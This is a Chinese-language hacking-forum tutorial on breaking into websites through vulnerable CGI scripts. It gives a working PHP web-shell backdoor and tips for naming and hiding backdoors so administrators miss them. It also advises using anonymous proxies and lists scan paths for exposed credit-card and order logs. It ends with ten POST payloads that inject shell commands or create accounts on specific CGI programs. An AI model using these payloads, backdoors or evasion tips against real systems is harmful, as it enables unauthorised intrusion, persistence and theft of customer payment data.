CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
( I/ S3 _4 X& c" q很开心来到贵论坛
  l2 F" i$ Z3 E# K这里让我感觉 很有技术交流的感觉
/ i- O/ r" i3 ~我会长长来玩的
前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
6 {0 y( A" u+ u我门都知道 国外伺服器大多是linux 平台
4 d5 O7 k. V4 ~! V$ T: V! l所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
5 G1 R: T3 R; Y5 K- S$ O
只是个人在实务上一些经验
' m/ Y7 R! o# A+ }! ^( c% Z3 m写的不好 请多多见谅喔
. g; T/ D* Q% B5 J. N2 f! ]9 y在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
, u' i' A1 z( D/ V* ^$ C% [* h. Z
& {/ ^# g4 W& S以下内容跟帖回复才能看到
6 Y( _8 u* r, @5 |2 Z. ~' G" y! p& r* |==============================
$ }# U$ w8 c& |2 R  Q
第1部份: 何谓Shell?
  t% `% b' v2 M' P/ l4 \+ [: J: CShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
% ?+ p$ `: I5 q; d2 W9 tA shell is the program which reads user input from the command line and executes actions based upon that input.
% i7 f; O( A2 q) h2 U6 c. e意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
& z2 ~, [) C' s8 B7 s8 @9 `
' Y5 t$ M: K6 K2 Y% ^对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
4 u& K+ C) m% |* `$ E, c5 X要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
( T! k/ N& t2 b5 a5 R; M; C; @所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

& S' }, k* F4 e3 J+ l第2部份: Unix 指令
1 `% C: D6 \% M9 ], G$ A以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
) Q) Z0 ~2 Q3 a( V4 j  P/ O如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
+ f* j3 a& g- \2 Z$ als /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
; s/ B: y+ [# o! b8 uls ../ -al: 详细列出上一层的资料夹及档案
/ W. b; H6 a9 Acat: 显示档案内容
) l8 ]1 f- [5 pcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
. v8 u1 ^2 y* g5 ?; Q- q. A: ?- Xcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
( Q4 l( U+ K! w4 d8 C0 k) `+ ^who: 显示谁login 至系统
6 ?# ^* @" v" B* g8 M( Jman: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
0 l5 v8 C/ v: y( k8 Lrmdir 删除目录
$ {! o9 _% U4 m$ T5 ?mv 移动档案
# E* X3 X) k3 \: u, x$ k$ qrm 删除档案

第3部份: Shell的使用
例如:
* n/ ?2 n0 x+ }1 d, {http://site.com/refer.php
  a2 \. ^- H' x! E这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
/ G( _% _* L+ ^<Input type="text" name="cmd">
<Input type="Submit">
! A1 M) ~8 ^+ @</Form>
, U7 G. }; w# K- a  b" J/ b- R<?php
- @: D6 {1 P' G; x+ Y- R. s$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
3 V% U+ \# }4 ?; [?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
8 o2 d4 t4 l0 p; m* j. `% M9 e  M
& u0 Y& a$ Q# k1 l7 K第4部份: 注意事项
% i5 R2 C/ h9 G- x$ F& a- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- O$ O& S+ f1 K8 B8 U- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
4 Y# {3 h- l" J8 S3 x( a) Z; x) b不容易被发现.
0 D) R  u7 T9 V- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
4 t1 `: o$ ]8 V这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

. @: T' |& {) w( @( V1.一开始对一个网站进行cgi漏洞扫描
, B& I5 L, T: o& ?我们需要的东西有
  |" \2 }3 _6 y9 {+ e1 G2 T. ?扫洞工具 如:triton..等等
8 m, B2 K' e5 w8 gE表
: _' G1 z2 O0 C0 A3 j# V! `2 ?如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
+ c/ p* K2 Y6 l- I& a4 q" s/Admin_files/order.log
" Z9 x# w. t" g! P5 \0 w/orders/mountain.cfg
. Q' F5 C  N5 F2 b7 H, ]9 }# u$ F/cgi-sys/cart.pl
/scripts/cart.pl
. U" C/ y- E; N/htbin/cart.pl
, `& r) E& P8 Q& PE表来源可以是网路收寻或是自己的0 day
2 i: l6 l. w' g3 Q" j3 M' F; J
7 W# ?1 M/ h" y9 v: K# x3 _9 }2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
2 J- ^  n8 a; r一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
+ p: z# n- b0 r, o! ^我们要找post 的方法很多
$ {6 d. e  S* Z( L5 L, V! ~可以是源代码分析 找出介质
5 ^9 ]7 g9 _. S4 I: M或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
* `. _* }, u& P: }/ u& ]2 j# B/ q, a5 h" W让大家可以针对网站去做扫描  
0 m& r- N0 L' L/ a* V0 `/index.cgi
wei=ren&gen=command
/passmaster.cgi
/ d9 l5 {3 Q( A4 fAction=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
3 f* L0 x5 w/ n- P5 Pname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/ U  d. u' Z8 l6 S$ @) f" A8 m/addusr.pl
/ U2 _( d" d  j9 F6 i) @7 v- X/cgi-bin/EuroDebit/addusr.pl
( J+ `6 o8 U) Z6 Uuser=username&pass=Password&confirm=Password
/ X1 Q* M6 |# k4 ]/ccbill-local.asp
post_values=username:password
+ Y: @! x# E) S$ h3 S4 b/count.cgi
+ r- d) y' C5 Y( W' Npinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
) |2 T$ U. d( z! Q( h2 p3 e/verotelrum.pl
/ Z( @+ j# |: g5 O6 W  s0 k; s: \vercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|

7 c% m( X% a- @6 `" b7 B# C今天就讲到这  感谢大家支持
$ Z7 l9 n: H" b) }2 i, s